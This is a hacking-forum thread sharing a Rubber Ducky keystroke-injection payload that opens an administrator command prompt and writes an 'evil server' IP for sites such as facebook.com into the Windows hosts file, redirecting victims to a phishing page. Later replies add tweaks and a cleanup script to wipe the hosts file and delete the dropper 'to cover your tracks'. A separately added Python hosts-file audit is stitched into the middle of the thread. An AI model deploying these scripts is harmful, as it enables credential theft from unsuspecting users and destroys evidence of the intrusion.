[Payload] Ducky Phisher


KoryusaiKun

Hi everyone,

This is my first post and first script for the rubber duck. I have not yet tested this script as I am still waiting to receive it here in the UK. I got it from when I was talking to my friend about something he called desktop phishing; it basically replaces, say, Facebook's or any other site's IP with your chosen server's IP in the hosts file. Anyway, here's the script:

REM Author: .:Koryusai-Kun:.
REM Description: Used for phishing, it adds an IP of your choosing to the hosts file on Windows
REM Description: so when the user types into their web browser, for example, www.facebook.com it
REM Description: instead of going to the proper IP it goes to the one in the hosts file, your evil one.
REM Description: you need to add the www. version and without it as well.
REM ---[Start CMD as administrator]-----------------------
GUI
DELAY 50
STRING cmd
DELAY 150
MENU
DELAY 75
STRING a
Enter
DELAY 200
LEFT
ENTER
STRING cls
ENTER
REM ---[END]----------------------------------------------
DELAY 300
REM ---[Inject into the host file]------------------------
STRING copy con inject.bat
ENTER
STRING SET NEWLINE=^& echo.
ENTER
ENTER
STRING FIND /C /I "[WEBSITE_ADDRESS]" %WINDIR%\system32\drivers\etc\hosts
ENTER
STRING IF %ERRORLEVEL% NEQ 0 ECHO %NEWLINE%^[EVIL_SERVER_IP] [WEBSITE_ADDRESS]>>%WINDIR%\system32\drivers\etc\hosts
ENTER
ENTER
STRING FIND /C /I "[WEBSITE_ADDRESS]" %WINDIR%\system32\drivers\etc\hosts
ENTER
STRING IF %ERRORLEVEL% NEQ 0 ECHO %NEWLINE%^[EVIL_SERVER_IP] [WEBSITE_ADDRESS]>>%WINDIR%\system32\drivers\etc\hosts
ENTER
CONTROL z
ENTER
STRING inject.bat
ENTER
REM ---[END]----------------------------------------------
DELAY 200
STRING exit
ENTER

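A defender-side counterpart to the hosts-file injection above and to the "reset the hosts file to empty" cleanup later in this thread, added here as an example and not part of any post: a Python audit that parses a Windows hosts file, flags public domains pinned to any address, and notices a file whose stock comment header is gone. The watchlist, the sample hosts content and the baseline hash are constructed for the example.

```python
"""Hosts-file audit for the tampering described in this thread: public domains
pinned to an attacker-chosen IP, and a file later replaced to cover tracks.
Added example; the sample hosts content and the watchlist are constructed."""
import hashlib
import ipaddress

# Constructed watchlist of domains that should never be overridden on a workstation.
WATCHLIST = {"facebook.com", "login.microsoftonline.com"}
LOOPBACK = {"127.0.0.1", "::1"}
LOOPBACK_OK = {"localhost", "localhost.localdomain"}  # legitimate loopback names

SAMPLE_HOSTS = """# constructed sample: stock comment header, then injected lines
#   127.0.0.1       localhost
127.0.0.1 www.facebook.com
127.0.0.1 facebook.com
10.0.0.5 intranet.example.internal
"""


def sha256_of(text):
    """Hash used to compare the live file against a recorded baseline."""
    return hashlib.sha256(text.encode("utf-8")).hexdigest()


def parse_hosts(text):
    """Return (ip, hostname, line_no) for every mapping; comments are ignored."""
    entries = []
    for n, raw in enumerate(text.splitlines(), 1):
        parts = raw.split("#", 1)[0].split()
        if not parts:
            continue
        try:
            ip = str(ipaddress.ip_address(parts[0]))
        except ValueError:
            continue  # first token is not an address, so this is not a mapping
        entries.extend((ip, name.lower(), n) for name in parts[1:])
    return entries


def audit_hosts(text, baseline_sha256=None):
    """Return (severity, message) findings; an empty list means nothing suspicious."""
    findings = []
    if baseline_sha256 is not None and sha256_of(text) != baseline_sha256:
        findings.append(("medium", "contents differ from the recorded baseline hash"))
    if not any(line.lstrip().startswith("#") for line in text.splitlines()):
        # The stock Windows hosts file is a block of comments; a file with none
        # has been replaced, which is what a 'copy con hosts' reset leaves behind.
        findings.append(("medium", "no comment header: file was replaced or wiped"))
    for ip, name, n in parse_hosts(text):
        if name in LOOPBACK_OK and ip in LOOPBACK:
            continue  # the only mappings a default workstation should carry
        if name in WATCHLIST or any(name.endswith("." + w) for w in WATCHLIST):
            findings.append(("high", f"line {n}: watchlisted domain {name} pinned to {ip}"))
        else:
            findings.append(("low", f"line {n}: unexpected override {name} -> {ip}"))
    return findings
```

Record `sha256_of` of the known-good file once per host and run the audit on a schedule; any non-empty result is worth an alert, and a hit on the watchlist is the pattern this thread's payload produces.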

You replace [WEBSITE_ADDRESS] with the website, like www.facebook.com, and the second with facebook.com, then you put the evil server IP where [EVIL_SERVER_IP] is. Here's an example:

...
REM ---[END]----------------------------------------------
DELAY 300
REM ---[Inject into the host file]------------------------
STRING copy con inject.bat
ENTER
STRING SET NEWLINE=^& echo.
ENTER
ENTER
STRING FIND /C /I "www.facebook.com" %WINDIR%\system32\drivers\etc\hosts
ENTER
STRING IF %ERRORLEVEL% NEQ 0 ECHO %NEWLINE%^127.0.0.1 www.facebook.com>>%WINDIR%\system32\drivers\etc\hosts
ENTER
ENTER
STRING FIND /C /I "facebook.com" %WINDIR%\system32\drivers\etc\hosts
ENTER
STRING IF %ERRORLEVEL% NEQ 0 ECHO %NEWLINE%^127.0.0.1 facebook.com>>%WINDIR%\system32\drivers\etc\hosts
ENTER
CONTROL z
ENTER
STRING inject.bat
ENTER
REM ---[END]----------------------------------------------
...


How do you reverse it if you want to reset the default settings? (Meaning you want to direct the user to the real page.)

thanks

xcopy the original file first before you edit it to host.backup. After you're done you can replace the hacked file with the original.


  • 3 months later...

I've not been able to get this to successfully execute. Can anyone confirm its successful operation? I tweaked the delays and it works like a charm. My next project related to this is a quick edit to this that will include the commands necessary (replying "yes") to overwrite the existing hosts file.

For those not familiar, if you successfully execute this command and try to run it again, you are prompted with a command line prompt asking for permission to overwrite the existing file. As soon as I have it tested and working, I'll post it. I went a simpler route, see the following post.

Edited by skimpniff

  • 2 weeks later...

Here is a cleanup script. Very simple, for if you want to reset the hosts file to empty to cover your tracks.

REM Author: skimpniff
REM Description: Clean up by resetting the hosts file back to empty and deleting the inject.bat file
ESCAPE
CONTROL ESCAPE
DELAY 600
STRING cmd
DELAY 1000
MENU
DELAY 1000
STRING a
DELAY 1000
LEFT
DELAY 1000
ENTER
DELAY 400
STRING cd drivers\etc\
DELAY 400
ENTER
DELAY 400
STRING copy con hosts
DELAY 400
ENTER
ENTER
DELAY 400
STRING All
ENTER
ENTER
DELAY 400
CONTROL z
DELAY 400
ENTER
DELAY 400
STRING exit
ENTER

Here is a modification to add to the bottom of the original that deletes the inject.bat file:

CONTROL z
ENTER
DELAY 400
STRING inject.bat
ENTER
DELAY 400
STRING del c:\windows\system32\inject.bat
ENTER
DELAY 400
STRING exit
ENTER

Edited by skimpniff